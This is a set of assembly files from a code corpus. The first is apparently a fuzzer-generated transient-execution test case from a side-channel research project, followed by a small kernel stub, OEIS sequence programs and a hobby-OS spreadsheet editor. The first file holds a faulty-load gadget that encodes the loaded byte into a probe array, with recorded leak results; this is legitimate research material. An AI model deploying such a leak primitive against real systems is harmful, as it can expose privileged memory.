{'OP': 'LOAD', 'src': {'size': 16, 'NT': False, 'type': 'addresses_A_ht', 'same': False, 'AVXalign': False, 'congruent': 6}}
{'OP': 'LOAD', 'src': {'size': 1, 'NT': False, 'type': 'addresses_WC_ht', 'same': False, 'AVXalign': False, 'congruent': 4}}
{'OP': 'STOR', 'dst': {'size': 2, 'NT': False, 'type': 'addresses_A_ht', 'same': False, 'AVXalign': False, 'congruent': 6}}
{'OP': 'REPM', 'src': {'same': False, 'type': 'addresses_UC_ht', 'congruent': 7}, 'dst': {'same': False, 'type': 'addresses_normal_ht', 'congruent': 6}}
{'OP': 'STOR', 'dst': {'size': 2, 'NT': False, 'type': 'addresses_WT_ht', 'same': False, 'AVXalign': False, 'congruent': 2}}
{'OP': 'STOR', 'dst': {'size': 2, 'NT': False, 'type': 'addresses_normal_ht', 'same': False, 'AVXalign': False, 'congruent': 5}}
{'OP': 'REPM', 'src': {'same': True, 'type': 'addresses_A_ht', 'congruent': 11}, 'dst': {'same': False, 'type': 'addresses_UC_ht', 'congruent': 4}}
{'OP': 'REPM', 'src': {'same': False, 'type': 'addresses_WT_ht', 'congruent': 9}, 'dst': {'same': False, 'type': 'addresses_A_ht', 'congruent': 0}}
{'OP': 'STOR', 'dst': {'size': 32, 'NT': False, 'type': 'addresses_WT_ht', 'same': False, 'AVXalign': False, 'congruent': 1}}
{'00': 21829}
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
*/
|
||||
TheStack | 103eaaf72c61b41012dd2ee3fafb31f4960dc812 | Assemblycode:Assembly | {"size": 7371, "ext": "asm", "max_stars_repo_path": "Transynther/x86/_processed/NONE/_ht_zr_un_/i9-9900K_12_0xa0.log_21829_1734.asm", "max_stars_repo_name": "ljhsiun2/medusa", "max_stars_repo_stars_event_min_datetime": "2020-08-13T19:41:58.000Z", "max_stars_repo_stars_event_max_datetime": "2022-03-30T12:22:51.000Z", "max_issues_repo_path": "Transynther/x86/_processed/NONE/_ht_zr_un_/i9-9900K_12_0xa0.log_21829_1734.asm", "max_issues_repo_name": "ljhsiun2/medusa", "max_issues_repo_issues_event_min_datetime": "2021-04-29T06:29:35.000Z", "max_issues_repo_issues_event_max_datetime": "2021-05-13T21:02:30.000Z", "max_forks_repo_path": "Transynther/x86/_processed/NONE/_ht_zr_un_/i9-9900K_12_0xa0.log_21829_1734.asm", "max_forks_repo_name": "ljhsiun2/medusa", "max_forks_repo_forks_event_min_datetime": "2020-07-14T17:07:07.000Z", "max_forks_repo_forks_event_max_datetime": "2022-03-21T01:12:22.000Z"} | {"max_stars_count": 9, "max_issues_count": 1, "max_forks_count": 3, "avg_line_length": 34.9336492891, "max_line_length": 2999, "alphanum_fraction": 0.6562203229} | .global s_prepare_buffers
s_prepare_buffers:
push %r10
push %r8
push %rax
push %rbp
push %rbx
push %rcx
push %rdi
push %rsi
lea addresses_UC_ht+0x2ebe, %r8
nop
nop
nop
nop
nop
cmp %r10, %r10
movb (%r8), %bl
nop
nop
nop
nop
add %r10, %r10
lea addresses_normal_ht+0xdd32, %rsi
lea addresses_WT_ht+0xfe3e, %rdi
nop
nop
xor %r8, %r8
mov $88, %rcx
rep movsb
nop
nop
nop
add $64729, %rbx
lea addresses_WC_ht+0xdc9e, %rcx
nop
nop
and %rbp, %rbp
mov (%rcx), %si
sub %r10, %r10
lea addresses_D_ht+0x13e3e, %rsi
lea addresses_WT_ht+0x1323e, %rdi
nop
nop
nop
nop
cmp $60255, %rax
mov $85, %rcx
rep movsw
cmp $36495, %rax
lea addresses_A_ht+0xb03e, %rsi
lea addresses_WC_ht+0x11620, %rdi
nop
sub %rbx, %rbx
mov $86, %rcx
rep movsq
nop
xor %rcx, %rcx
lea addresses_UC_ht+0x1be, %r10
nop
nop
nop
nop
add $13749, %rdi
mov $0x6162636465666768, %rcx
movq %rcx, (%r10)
nop
cmp $40584, %rdi
lea addresses_A_ht+0x140be, %r10
nop
nop
nop
nop
cmp $5110, %r8
movl $0x61626364, (%r10)
nop
nop
nop
nop
nop
xor $24690, %rcx
lea addresses_normal_ht+0x12bd6, %r8
nop
nop
nop
and %rbp, %rbp
mov $0x6162636465666768, %rsi
movq %rsi, %xmm6
vmovups %ymm6, (%r8)
sub $58572, %rax
lea addresses_WC_ht+0x2e6e, %rsi
lea addresses_normal_ht+0x170da, %rdi
nop
sub $58630, %r8
mov $49, %rcx
rep movsq
nop
nop
nop
cmp $17465, %rdi
lea addresses_A_ht+0x16d3e, %rsi
nop
nop
nop
cmp %r10, %r10
mov $0x6162636465666768, %r8
movq %r8, %xmm1
movups %xmm1, (%rsi)
nop
nop
nop
nop
sub $24944, %r10
lea addresses_D_ht+0x14aaa, %rbx
nop
nop
nop
nop
nop
cmp %rsi, %rsi
mov (%rbx), %rdi
xor $56732, %r10
pop %rsi
pop %rdi
pop %rcx
pop %rbx
pop %rbp
pop %rax
pop %r8
pop %r10
ret
.global s_faulty_load
s_faulty_load:
push %r10
push %r11
push %r13
push %r15
push %rcx
push %rdi
push %rsi
// Store
mov $0x4facef0000000f36, %rdi
clflush (%rdi)
nop
nop
nop
add %rsi, %rsi
movl $0x51525354, (%rdi)
add $22581, %r15
// Store
lea addresses_A+0x9846, %rdi
cmp $31162, %r10
mov $0x5152535455565758, %rcx
movq %rcx, %xmm2
movaps %xmm2, (%rdi)
nop
nop
nop
nop
xor %rsi, %rsi
// Faulty Load
lea addresses_WC+0x483e, %rdi
nop
nop
nop
nop
nop
xor $62330, %r11
movups (%rdi), %xmm4
vpextrq $0, %xmm4, %r13
lea oracles, %r10
and $0xff, %r13
shlq $12, %r13
mov (%r10,%r13,1), %r13
pop %rsi
pop %rdi
pop %rcx
pop %r15
pop %r13
pop %r11
pop %r10
ret
/*
<gen_faulty_load>
[REF]
{'src': {'NT': False, 'same': False, 'congruent': 0, 'type': 'addresses_WC', 'AVXalign': False, 'size': 2}, 'OP': 'LOAD'}
{'OP': 'STOR', 'dst': {'NT': False, 'same': False, 'congruent': 1, 'type': 'addresses_NC', 'AVXalign': False, 'size': 4}}
{'OP': 'STOR', 'dst': {'NT': False, 'same': False, 'congruent': 2, 'type': 'addresses_A', 'AVXalign': True, 'size': 16}}
[Faulty Load]
{'src': {'NT': False, 'same': True, 'congruent': 0, 'type': 'addresses_WC', 'AVXalign': False, 'size': 16}, 'OP': 'LOAD'}
<gen_prepare_buffer>
{'src': {'NT': True, 'same': False, 'congruent': 7, 'type': 'addresses_UC_ht', 'AVXalign': False, 'size': 1}, 'OP': 'LOAD'}
{'src': {'same': False, 'congruent': 2, 'type': 'addresses_normal_ht'}, 'OP': 'REPM', 'dst': {'same': False, 'congruent': 8, 'type': 'addresses_WT_ht'}}
{'src': {'NT': False, 'same': False, 'congruent': 5, 'type': 'addresses_WC_ht', 'AVXalign': False, 'size': 2}, 'OP': 'LOAD'}
{'src': {'same': False, 'congruent': 8, 'type': 'addresses_D_ht'}, 'OP': 'REPM', 'dst': {'same': False, 'congruent': 9, 'type': 'addresses_WT_ht'}}
{'src': {'same': False, 'congruent': 11, 'type': 'addresses_A_ht'}, 'OP': 'REPM', 'dst': {'same': False, 'congruent': 1, 'type': 'addresses_WC_ht'}}
{'OP': 'STOR', 'dst': {'NT': False, 'same': False, 'congruent': 7, 'type': 'addresses_UC_ht', 'AVXalign': False, 'size': 8}}
{'OP': 'STOR', 'dst': {'NT': False, 'same': False, 'congruent': 7, 'type': 'addresses_A_ht', 'AVXalign': False, 'size': 4}}
{'OP': 'STOR', 'dst': {'NT': False, 'same': False, 'congruent': 3, 'type': 'addresses_normal_ht', 'AVXalign': False, 'size': 32}}
{'src': {'same': False, 'congruent': 3, 'type': 'addresses_WC_ht'}, 'OP': 'REPM', 'dst': {'same': True, 'congruent': 1, 'type': 'addresses_normal_ht'}}
{'OP': 'STOR', 'dst': {'NT': False, 'same': False, 'congruent': 8, 'type': 'addresses_A_ht', 'AVXalign': False, 'size': 16}}
{'src': {'NT': False, 'same': False, 'congruent': 2, 'type': 'addresses_D_ht', 'AVXalign': False, 'size': 8}, 'OP': 'LOAD'}
{'08': 2, '48': 8914, '16': 1, '00': 12911, '46': 1}
00 48 00 48 00 48 00 48 48 00 48 00 48 00 48 48 48 48 48 48 00 00 48 48 48 00 48 00 48 48 00 00 00 00 48 00 48 00 48 48 48 00 00 00 00 00 48 00 48 00 48 48 48 00 48 00 00 00 00 48 48 48 00 00 00 00 00 00 00 48 00 00 00 00 00 48 00 48 00 00 00 00 48 00 00 00 48 00 48 48 48 00 48 00 48 48 00 00 00 00 48 48 48 48 48 48 48 48 48 00 00 00 00 00 00 00 00 48 48 00 00 00 00 00 00 00 00 48 00 48 48 00 00 48 00 00 48 48 00 00 00 00 48 48 00 00 00 00 48 00 00 48 00 00 00 48 48 48 48 00 00 00 00 00 00 00 48 48 00 48 00 48 00 48 00 48 00 48 48 00 48 00 48 00 48 00 00 00 48 00 48 48 48 00 48 00 00 00 00 00 00 48 00 00 00 48 00 00 48 48 48 00 00 00 48 48 48 48 00 00 00 48 48 48 00 48 00 48 00 48 00 00 00 00 00 48 00 00 48 00 48 48 00 00 00 00 00 48 00 48 00 00 48 00 48 00 00 00 00 00 00 00 48 48 48 48 00 00 48 00 00 00 00 00 48 48 48 48 48 00 00 00 00 00 00 48 48 48 00 48 48 48 00 00 48 00 00 00 00 00 48 00 00 00 48 48 00 00 00 48 48 48 48 48 48 48 48 48 00 00 48 48 00 00 00 00 48 00 48 00 00 48 00 00 00 48 00 48 00 00 00 48 48 00 48 00 48 00 00 00 00 00 00 00 00 48 48 48 00 48 48 48 00 00 00 48 00 00 00 00 48 00 00 48 00 00 48 00 00 48 00 48 48 00 48 00 48 00 00 00 00 00 48 00 48 48 00 48 00 48 00 00 00 48 48 00 48 00 00 00 48 00 48 48 00 48 00 00 00 00 48 00 48 48 48 00 48 48 48 00 48 00 48 00 48 00 00 48 00 48 48 00 00 48 48 48 00 48 00 00 48 00 00 48 00 48 48 48 00 00 00 00 48 00 48 48 00 48 48 00 00 00 48 48 48 00 48 48 00 48 48 00 00 00 00 00 00 48 48 00 48 00 48 00 00 48 00 48 00 48 00 48 00 48 48 48 48 48 48 48 00 48 00 48 00 48 00 00 48 00 00 48 00 00 00 00 00 00 00 48 00 00 48 48 48 00 00 00 48 00 00 00 48 00 00 48 48 00 00 48 00 00 48 48 48 00 00 48 00 00 48 00 00 48 00 00 00 00 48 00 48 48 48 48 48 00 48 48 48 00 00 48 48 00 48 48 00 48 00 00 48 00 48 48 00 00 00 00 00 00 00 48 00 48 00 00 48 00 00 00 48 48 00 48 00 00 00 48 00 48 00 00 48 00 48 00 00 00 48 00 00 00 00 00 48 48 00 00 00 48 00 00 00 00 00 00 00 48 48 00 48 48 00 00 00 00 48 00 48 48 00 00 00 00 48 00 00 48 00 00 48 00 00 00 00 00 00 00 48 00 48 48 00 00 48 00 48 48 48 00 00 48 00 48 48 48 48 48 00 00 00 00 00 00 48 00 00 00 48 00 00 00 48 48 00 00 00 48 00 48 00 00 48 48 00 00 00 00 00 00 48 48 00 00 00 48 48 00 48 00 48 00 00 48 48 48 48 48 00 00 48 00 00 00 00 00 00 00 48 00 00 00 48 48 48 00 48 00 00 00 48 00 48 48 48 00 00 00 48 00 00 00 48 00 48 00 48 48 00 48 00 00 00 00 48 48 48 00 48 48 00 00 00 00 00 00 00 48 00 48 48 00 48 48 00 00 00 00 48 00 48 48 00 48 00 48 00 48 00 00 00 48 48 48 48 48 48 00 00 00 48 00 00 00 00 00 48 48 48 48 00 48 00 48 00 48 48 00 00 48 48 00 00 00 00 00 00 00 00 00 00 48 48 48 00 48 48 00 00 00 48 00 00 00 00 48 00 00 48 00 00 48 48 48 48 48 00 48 00 48 48 48 00 48 48 48 48 00 00 48 00 48 48 48 00 00 00 00 00 48 00 00 00 00 00 48 48 48 48 00 00 48 00 00 00 00 00 00 00 00 00 00 00 00 48 48 48 48 00 00 48 48 00 00 00 48 00 48 00 00 48 48 00 00 48 48 00 48 48 48 00 00 00 48 00 48 48 00 00 48 48 00 00 00 48 00 48 48 00 00 48 48 00 00 00 48 48 48 48 00
*/
|
||||
TheStack | 5053ae56f4d6112604ecb05d8a09a46c1e2e4239 | Assemblycode:Assembly | {"size": 1005, "ext": "asm", "max_stars_repo_path": "kernel.asm", "max_stars_repo_name": "dolumese/mKernel", "max_stars_repo_stars_event_min_datetime": null, "max_stars_repo_stars_event_max_datetime": null, "max_issues_repo_path": "kernel.asm", "max_issues_repo_name": "dolumese/mKernel", "max_issues_repo_issues_event_min_datetime": null, "max_issues_repo_issues_event_max_datetime": null, "max_forks_repo_path": "kernel.asm", "max_forks_repo_name": "dolumese/mKernel", "max_forks_repo_forks_event_min_datetime": null, "max_forks_repo_forks_event_max_datetime": null} | {"max_stars_count": null, "max_issues_count": null, "max_forks_count": null, "avg_line_length": 18.6111111111, "max_line_length": 72, "alphanum_fraction": 0.6179104478} | ;;;;;;;;;;;;;;;;;;;;;
;; Copyright (C) 2014 Arjun Sreedharan
;; License: GPL version 2 or higher http://www.gnu.org/licenses/gpl.html
;;;;;;;;;;;;;;;;;;;;;
bits 32
section .text
;multiboot spec
align 4
dd 0x1BADB002 ;magic
dd 0x00 ;flags
dd -(0x1BADB002 + 0x00) ;checksum. m+f+c should be zero
global start
global kbHandler ;keyboard driver handler
global rPort ;read port
global wPort ;write port
global loadIdt
extern kmain ;this is defined in the c file
extern kbHandlerMain
rPort:
mov edx, [esp + 4]
;al is the lower 8 bits of eax
in al, dx ;dx is the lower 16 bits of edx
ret
wPort:
mov edx, [esp + 4]
mov al, [esp + 4 + 4]
out dx, al
ret
loadIdt:
mov edx, [esp + 4]
lidt [edx]
sti ;turn on interrupts
ret
kbHandler:
call kbHandlerMain
iretd
start:
cli ;block interrupts
mov esp, stack_space
call kmain
hlt ;halt the CPU
section .bss
resb 8192 ;8KB for stack
stack_space:
|
||||
TheStack | 6166e598b291b548579389e4f2f8732fe6c55c21 | Assemblycode:Assembly | {"size": 1490, "ext": "asm", "max_stars_repo_path": "programs/oeis/017/A017309.asm", "max_stars_repo_name": "neoneye/loda", "max_stars_repo_stars_event_min_datetime": "2018-02-06T19:19:31.000Z", "max_stars_repo_stars_event_max_datetime": "2022-01-17T21:53:31.000Z", "max_issues_repo_path": "programs/oeis/017/A017309.asm", "max_issues_repo_name": "neoneye/loda", "max_issues_repo_issues_event_min_datetime": "2021-02-22T19:00:34.000Z", "max_issues_repo_issues_event_max_datetime": "2021-08-28T10:47:47.000Z", "max_forks_repo_path": "programs/oeis/017/A017309.asm", "max_forks_repo_name": "neoneye/loda", "max_forks_repo_forks_event_min_datetime": "2021-02-24T21:14:16.000Z", "max_forks_repo_forks_event_max_datetime": "2021-08-09T19:48:05.000Z"} | {"max_stars_count": 22, "max_issues_count": 41, "max_forks_count": 5, "avg_line_length": 212.8571428571, "max_line_length": 1428, "alphanum_fraction": 0.910738255} | ; A017309: a(n) = (10*n + 3)^5.
; 243,371293,6436343,39135393,147008443,418195493,992436543,2073071593,3939040643,6956883693,11592740743,18424351793,28153056843,41615795893,59797108943,83841135993,115063617043,154963892093,205236901143,267785184193,344730881243,438427732293,551473077343,686719856393,847288609443,1036579476493,1258284197543,1516398112593,1815232161643,2159424884693,2553954421743,3004150512793,3515706497843,4094691316893,4747561509943,5481173216993,6302794178043,7220115733093,8241264822143,9374815985193,10629803362243,12015732693293,13542593318343,15220870177393,17061555810443,19076162357493,21276733558543,23675856753593,26286674882643,29122898485693,32198817702743,35529314273793,39129873538843,43016596437893,47206211510943,51716086897993,56564242339043,61769361174093,67350802343143,73328612386193,79723537443243,86557035254293,93851287159343,101629210098393,109914468611443,118731486838493,128105460519543,138062368994593,148628987203643,159832897686693,171702502583743,184267035634793,197556574179843,211602051158893,226435267111943,242088902178993,258596528100043,275992620215093,294312569464143,313592694387193,333870253124243,355183455415293,377571474600343,401074459619393,425733547012443,451590872919493,478689585080543,507073854835593,536788889124643,567880942487693,600397329064743,634386434595793,669897728420843,706981775479893,745690248312943,786075939059993,828192771461043,872095812856093,917841286185143,965486581988193
mul $0,10
add $0,3
pow $0,5
|
||||
TheStack | 096ca915f413f2e3e0129751bdf46c4b983c0d9f | Assemblycode:Assembly | {"size": 6553, "ext": "asm", "max_stars_repo_path": "programs/spreadst.asm", "max_stars_repo_name": "informer2016/MichalOS", "max_stars_repo_stars_event_min_datetime": null, "max_stars_repo_stars_event_max_datetime": null, "max_issues_repo_path": "programs/spreadst.asm", "max_issues_repo_name": "informer2016/MichalOS", "max_issues_repo_issues_event_min_datetime": null, "max_issues_repo_issues_event_max_datetime": null, "max_forks_repo_path": "programs/spreadst.asm", "max_forks_repo_name": "informer2016/MichalOS", "max_forks_repo_forks_event_min_datetime": null, "max_forks_repo_forks_event_max_datetime": null} | {"max_stars_count": null, "max_issues_count": null, "max_forks_count": null, "avg_line_length": 14.2766884532, "max_line_length": 91, "alphanum_fraction": 0.6557301999} | ; ------------------------------------------------------------------
; MichalOS Spreadsheet editor
; ------------------------------------------------------------------
BITS 16
%INCLUDE "michalos.inc"
ORG 100h
start:
call .clear_buffer
call .draw_background
.loop:
call .clear_screen
call os_wait_for_key
cmp ah, 72
je near .go_up
cmp ah, 75
je near .go_left
cmp ah, 77
je near .go_right
cmp ah, 80
je near .go_down
cmp ah, 83
je near .delete
cmp al, 13
je near .enter
cmp ah, 59
je near .file_menu
cmp ah, 60
je near .delete_row
cmp ah, 61
je near .insert_row
cmp ah, 24
je near .open_file
cmp ah, 31
je near .save_file
cmp ah, 49
je near .new_file
cmp ax, 1F00h ; Ctrl + Alt + S
je near .save_file_as
cmp ah, 16
je near .exit
cmp al, 27
je near .exit
jmp .loop
.delete_row:
mov ah, 0
mov al, [.cursor_y]
add al, [.offset]
mov bx, 72
mul bx
add ax, buffer
mov di, ax
add ax, 72
mov si, ax
mov cx, 14400
rep movsb
jmp .loop
.insert_row:
mov ah, 0
mov al, [.cursor_y]
add al, [.offset]
mov bx, 72
mul bx
add ax, buffer
mov si, buffer + 14400
mov di, buffer + 14400 + 72
.insert_loop:
mov al, [si]
mov [di], al
dec si
dec di
cmp si, ax
jg .insert_loop
mov di, ax
mov al, 0
mov cx, 72
rep stosb
jmp .loop
.delete:
mov ah, 0
mov al, [.cursor_x]
mov bx, 8
mul bx
push ax
mov ah, 0
mov al, [.cursor_y]
add al, [.offset]
mov bx, 72
mul bx
pop bx
add ax, bx
add ax, buffer
mov di, ax
mov al, 0
stosb
jmp .loop
.enter:
mov ah, 0
mov al, [.cursor_x]
mov bx, 8
mul bx
push ax
mov ah, 0
mov al, [.cursor_y]
add al, [.offset]
mov bx, 72
mul bx
pop bx
add ax, bx
add ax, buffer
call os_input_string
jmp .loop
.go_up:
cmp byte [.cursor_y], 0
je .decrease_offset
dec byte [.cursor_y]
jmp .loop
.go_left:
cmp byte [.cursor_x], 0
je .loop
dec byte [.cursor_x]
jmp .loop
.go_right:
cmp byte [.cursor_x], 8
je .loop
inc byte [.cursor_x]
jmp .loop
.go_down:
cmp byte [.cursor_y], 19
je .increase_offset
inc byte [.cursor_y]
jmp .loop
.increase_offset:
cmp byte [.offset], 180
je .loop
inc byte [.offset]
jmp .loop
.decrease_offset:
cmp byte [.offset], 0
je .loop
dec byte [.offset]
jmp .loop
.clear_screen:
call os_hide_cursor
mov dh, 3
mov dl, 8
.clear_screen_loop:
call os_move_cursor
mov cx, 72
mov ah, 0Ah
mov bh, 0
mov al, 32
int 10h
inc dh
cmp dh, 23
jl .clear_screen_loop
mov ah, 0
mov al, [.offset]
mov bx, 72
mul bx
mov dh, 3
mov dl, 8
mov si, buffer
add si, ax
.render_screen:
call os_move_cursor
call os_print_string
add si, 8
add dl, 8
cmp dl, 80
jl .render_screen
mov dl, 8
inc dh
cmp dh, 23
jl .render_screen
mov dh, 3
mov dl, 0
.enter_clean_loop:
call os_move_cursor
mov cx, 8
mov ah, 0Ah
mov bh, 0
mov al, 32
int 10h
inc dh
cmp dh, 23
jl .enter_clean_loop
mov dh, 3
mov dl, 2
mov ah, 0
mov al, [.offset]
inc al
call .draw_background_loop
mov dl, 0
mov dh, [.cursor_y]
add dh, 3
call os_move_cursor
mov si, .pointer
call os_print_string
mov ax, [.cursor_x] ; Set the cursor position
mov bx, 8
mul bx
add ax, 8
push ax
mov ax, [.cursor_y]
add ax, 3
pop dx
mov dh, al
call os_move_cursor
call os_show_cursor
ret
.draw_background:
mov ax, .title_msg ; Set up the screen with info at top and bottom
mov bx, .footer_msg
mov cx, BLACK_ON_WHITE
call os_draw_background
mov dl, 0
mov dh, 1
call os_move_cursor
mov ah, 09h
mov al, 32
mov bh, 0
mov bl, 10001111b
mov cx, 160
int 10h
mov dl, 0
mov dh, 3
mov cx, 8
.draw_gray_loop:
call os_move_cursor
int 10h
inc dh
cmp dh, 24
jl .draw_gray_loop
mov dh, 2
mov dl, 8
call os_move_cursor
mov si, .column_text
call os_print_string
mov dh, 3
mov dl, 2
mov ah, 0
mov al, [.offset]
inc al
.draw_background_loop:
call os_move_cursor
push ax
call os_int_to_string
mov si, ax
call os_print_string
inc dh
pop ax
inc ax
cmp dh, 23
jl .draw_background_loop
ret
.clear_buffer:
pusha
mov di, buffer
mov al, 0
mov cx, 14400
rep stosb
popa
ret
.file_menu:
mov ax, .chooselist
mov bx, 18
call os_option_menu
cmp ax, 1
je near .new_file
cmp ax, 2
je near .open_file
cmp ax, 3
je near .save_file
cmp ax, 4
je near .save_file_as
cmp ax, 5
je near .exit
call .draw_background
jmp .loop
.new_file:
mov ax, .confirm_msg
mov bx, .confirm_msg1
mov cx, 0
mov dx, 0
call os_dialog_box
cmp ax, 1
je near .end
mov ax, .filename
mov bx, .new_file_msg
call os_input_dialog
.end:
call .draw_background
jmp .loop
.open_file:
call os_file_selector
jc .end
push ax
mov di, ax
call os_string_length
add di, ax
sub di, 3
mov si, .sps_extension
mov cx, 3
rep cmpsb
jne .invalid_extension
pop si
mov di, .filename
call os_string_copy
mov si, .filename
call os_print_string
call os_wait_for_key
mov ax, si
mov cx, buffer
call os_load_file
call .draw_background
jmp .loop
.save_file:
cmp byte [.filename], 0
je .save_file_as
mov ax, .filename
call os_remove_file
jc .write_error
mov ax, .filename
mov cx, 14400
mov bx, buffer
call os_write_file
jc .write_error
mov ax, .save_succeed
mov bx, 0
mov cx, 0
mov dx, 0
call os_dialog_box
call .draw_background
jmp .loop
.save_file_as:
mov ax, .filename
mov bx, .new_file_msg
call os_input_dialog
mov cx, 14400
mov bx, buffer
call os_write_file
jc .write_error
call .draw_background
jmp .loop
.write_error:
mov ax, .save_fail_msg1
mov bx, .save_fail_msg2
mov cx, 0
mov dx, 0
call os_dialog_box
call .draw_background
jmp .loop
.exit:
ret
.invalid_extension:
mov ax, .wrong_ext_msg
mov bx, 0
mov cx, 0
mov dx, 0
call os_dialog_box
call .draw_background
jmp .loop
.pointer db '#', 0
.wrong_ext_msg db 'Invalid file type (SPS only)!', 0
.sps_extension db 'SPS', 0
.save_fail_msg1 db 'Error saving the file!', 0
.save_fail_msg2 db '(Invalid filename/disk is read-only?)', 0
.save_succeed db 'File saved.', 0
.chooselist db 'New,Open...,Save,Save as...,Exit', 0
.confirm_msg db 'Are you sure? All unsaved changes will', 0
.confirm_msg1 db 'be lost!', 0
.new_file_msg db 'Choose a new filename (DOCUMENT.SPS):', 0
.cursor_x db 0
.cursor_y db 0
.offset db 0
.title_msg db 'MichalOS Spreadsheet Editor', 0
.footer_msg db '[F1] File [F2/F3] Delete/Insert a row', 0
.blank_string db 0
.column_text db ' A B C D E F G H I', 0
.filename times 32 db 0
buffer: |
||||
TheStack | 44f3a6756f033c3161354dcf153f077b2cbed499 | Assemblycode:Assembly | {"size": 404, "ext": "asm", "max_stars_repo_path": "programs/oeis/290/A290562.asm", "max_stars_repo_name": "neoneye/loda", "max_stars_repo_stars_event_min_datetime": "2018-02-06T19:19:31.000Z", "max_stars_repo_stars_event_max_datetime": "2022-01-17T21:53:31.000Z", "max_issues_repo_path": "programs/oeis/290/A290562.asm", "max_issues_repo_name": "neoneye/loda", "max_issues_repo_issues_event_min_datetime": "2021-02-22T19:00:34.000Z", "max_issues_repo_issues_event_max_datetime": "2021-08-28T10:47:47.000Z", "max_forks_repo_path": "programs/oeis/290/A290562.asm", "max_forks_repo_name": "neoneye/loda", "max_forks_repo_forks_event_min_datetime": "2021-02-24T21:14:16.000Z", "max_forks_repo_forks_event_max_datetime": "2021-08-09T19:48:05.000Z"} | {"max_stars_count": 22, "max_issues_count": 41, "max_forks_count": 5, "avg_line_length": 33.6666666667, "max_line_length": 292, "alphanum_fraction": 0.6113861386} | ; A290562: a(n) = n - cos(n*Pi/2).
; -1,1,3,3,3,5,7,7,7,9,11,11,11,13,15,15,15,17,19,19,19,21,23,23,23,25,27,27,27,29,31,31,31,33,35,35,35,37,39,39,39,41,43,43,43,45,47,47,47,49,51,51,51,53,55,55,55,57,59,59,59,61,63,63,63,65,67,67,67,69,71,71,71,73,75,75,75,77,79,79,79,81,83,83,83,85,87,87,87,89,91,91,91,93,95,95,95,97,99,99
mov $2,$0
sub $0,1
mov $1,1
pow $2,2
add $1,$2
bin $1,2
mod $1,4
add $0,$1
|
||||
